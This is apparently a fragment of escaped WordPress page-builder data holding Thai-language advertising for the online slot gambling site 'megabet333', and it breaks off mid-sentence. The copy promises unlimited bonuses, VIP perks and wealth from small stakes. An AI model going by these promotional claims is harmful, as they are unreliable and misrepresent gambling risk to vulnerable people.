\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e48\\u0e32\\u0e22\\u0e43\\u0e2b\\u0e0d\\u0e48 megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 